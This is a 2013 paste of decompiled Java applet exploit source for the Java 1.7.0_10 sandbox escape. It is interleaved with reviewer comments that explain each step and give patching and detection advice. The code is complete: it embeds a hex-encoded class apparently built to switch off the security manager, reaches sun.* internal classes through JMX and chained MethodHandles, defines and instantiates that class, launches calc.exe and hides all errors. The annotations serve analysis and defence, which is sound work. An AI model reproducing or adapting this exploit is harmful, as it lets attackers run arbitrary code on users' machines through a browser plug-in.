
Java 0day 1.7.0_10 decrypted source

By: a guest on Jan 10th, 2013  |  syntax: Java  |  size: 4.83 KB  |  views: 7,190  |  expires: Never
  1. /*
  2. Java 0day 1.7.0_10 decrypted source
  3. Originally posted at https://damagelab.org/index.php?showtopic=23719&st=0
  4. From Russia with love.
  5. */
  6.  
  7. import java.applet.Applet;
  8.  
  9. import com.sun.jmx.mbeanserver.JmxMBeanServer;
  10.  
  11. import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
  12.  
  13. import com.sun.jmx.mbeanserver.MBeanInstantiator;
  14.  
  15. import java.lang.invoke.MethodHandle;
  16.  
  17. import java.lang.invoke.MethodHandles;
  18.  
  19. import java.lang.invoke.MethodType;
  20.  
  21. import java.lang.reflect.Method;
  22.  
  23.  
  24.  
  25.  
  26.  
  /**
   * Decodes a string of hexadecimal digit pairs into the bytes they spell.
   *
   * <p>Each two-character slice is parsed with radix 16 and narrowed to a byte. The
   * output length is {@code paramString.length() / 2}, so an odd trailing character
   * is silently ignored. In this listing the only caller is {@code init()}, which
   * uses it to turn the embedded hex string back into class-file bytes.
   *
   * @param paramString hex text, two characters per output byte
   * @return the decoded bytes, in input order
   * @throws NumberFormatException if a two-character slice cannot be parsed as base 16
   */
  public byte[] hex2Byte(String paramString)
  {
    final int byteCount = paramString.length() / 2;
    final byte[] decoded = new byte[byteCount];
    int offset = 0;
    for (int index = 0; index < byteCount; index++)
    {
      // Take the next pair of characters and keep only the low eight bits.
      final String pair = paramString.substring(offset, offset + 2);
      decoded[index] = (byte) Integer.parseInt(pair, 16);
      offset += 2;
    }
    return decoded;
  }
  46.  
  // NOTE(review): this literal is a hex-encoded Java class file; it begins with the
  // CAFEBABE class-file magic. Decoding the constant-pool strings in the hex gives
  // java/security/PrivilegedExceptionAction, java/security/AccessController,
  // doPrivileged, java/lang/System and setSecurityManager, with class name "B" and
  // source file "B.java". Together with the field name, that suggests the class exists
  // to switch the security manager off -- confirm by disassembling the decoded bytes
  // offline (for example with javap), never by loading them.
  // Detection: a long string literal starting with CAFEBABE inside applet code is a
  // strong indicator of a class hidden from scanners that only list the JAR's entries.
  // The "& #34;" on the first line is an opening double quote mangled into an HTML
  // entity by the paste; it is left exactly as found.
  47. public static String ByteArrayWithSecOff = & #34;CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001
  48.  00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501
  49.  00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578
  50.  63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F
  51.  07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263
  52.  6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F
  53.  457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142
  54.  0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469
  55.  6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F
  56.  50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445
  57.  7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176
  58.  612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A
  59.  6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000
  60.  020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100
  61.  040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600
  62.  02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107
  63.  0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000
  64.  02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600
  65. 0000020017";
  66.  
  67.  
  68.  
  /*
   * NOTE(review) -- defensive reading of this method. The enclosing class header is
   * not part of the paste; given the java.applet.Applet import this is presumably the
   * applet lifecycle init() -- confirm.
   *
   * What the visible code does, in order:
   *   1. decodes ByteArrayWithSecOff from hex into class-file bytes;
   *   2. builds a JmxMBeanServer and asks its MBeanInstantiator to findClass() two
   *      sun.org.mozilla.javascript.internal.* classes, passing a null ClassLoader;
   *   3. obtains Lookup.findConstructor and Lookup.findVirtual as MethodHandles from
   *      publicLookup() and calls them through invokeWithArguments, not directly;
   *   4. uses the resulting handles to construct a Context, call createClassLoader
   *      with a null argument, and defineClass() the decoded bytes, then instantiates
   *      the class that was defined;
   *   5. starts calc.exe -- presumably a visible proof-of-execution marker;
   *   6. discards every Throwable.
   *
   * Mitigation: keep the JRE patched beyond the release named in the paste header
   * (1.7.0_10) and disable or click-to-play the browser Java plug-in. Where a
   * SecurityManager is relied on, check that internal packages such as
   * com.sun.jmx.mbeanserver and sun.org.mozilla.javascript.internal are covered by the
   * package.access security property -- verify in the runtime's java.security file.
   *
   * Detection: flag applet or untrusted code that combines com.sun.jmx.mbeanserver
   * imports, sun.* class names passed as strings, reflective use of
   * MethodHandles.Lookup, a defineClass call on decoded bytes, and a process launched
   * by the Java plug-in process.
   */
  69.  public void init()
  70.  
  71.  {
  72.  
  73.    try
  74.  
  75.    {
  76.  
  77.      
  78.  
  // Rebuild the embedded class file from its hex form.
  79.      byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff);
  80.  
  // Internal JMX classes are used only as a route to findClass(); no MBean is registered
  // anywhere in this method.
  81.      JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
  82.  
  83.      JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
  84.  
  85.      MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
  86.  
  // The loader argument is deliberately null.
  87.      ClassLoader a = null;
  88.  
  // Class objects for two JDK-internal (sun.*) types are fetched by name.
  // NOTE(review): sandboxed code is normally denied sun.* packages -- confirm against the
  // vendor advisory for this release.
  89.      Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
  90.  
  91.      Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
  92.  
  93.      MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
  94.  
  // Lookup.findConstructor is itself resolved as a MethodHandle and then invoked via
  // invokeWithArguments. NOTE(review): the indirection presumably matters because Lookup
  // access checks depend on who the caller appears to be -- confirm against the advisory.
  95.      MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
  96.  
  97.      MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
  98.  
  99.      MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
  100.  
  101.      MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
  102.  
  // Instantiate the Context class through its no-argument constructor handle.
  103.      Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
  104.  
  // Same indirection for Lookup.findVirtual, which is reused twice below.
  105.      MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
  106.  
  107.      MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
  108.  
  109.      MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
  110.  
  111.      MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
  112.  
  // Context.createClassLoader is called with a null argument; the result is the loader
  // object used for defineClass below.
  113.      Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
  114.  
  115.      MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
  116.  
  117.      MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
  118.  
  // The decoded bytes become a live class here; the name argument is null.
  119.      Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
  120.  
  // Instantiating the defined class runs its constructor. NOTE(review): per the strings in
  // the embedded class, that constructor likely reaches System.setSecurityManager inside
  // doPrivileged -- confirm by disassembly.
  121.      localClass3.newInstance();
  122.  
  123.  
  124.  
  125.  
  126.  
  // A child process started by the Java plug-in is a high-signal endpoint detection;
  // calc.exe here is only the marker this sample uses.
  127.      Runtime.getRuntime().exec("calc.exe");
  128.  
  129.  
  130.  
  131.    }  
  132.  
  // Every Throwable is swallowed: on a patched runtime the denial raised above is
  // discarded and the applet shows no error. Log the exception when analysing.
  133.    catch (Throwable ex) {}
  134.  
  135.  }
  136.  
  137. }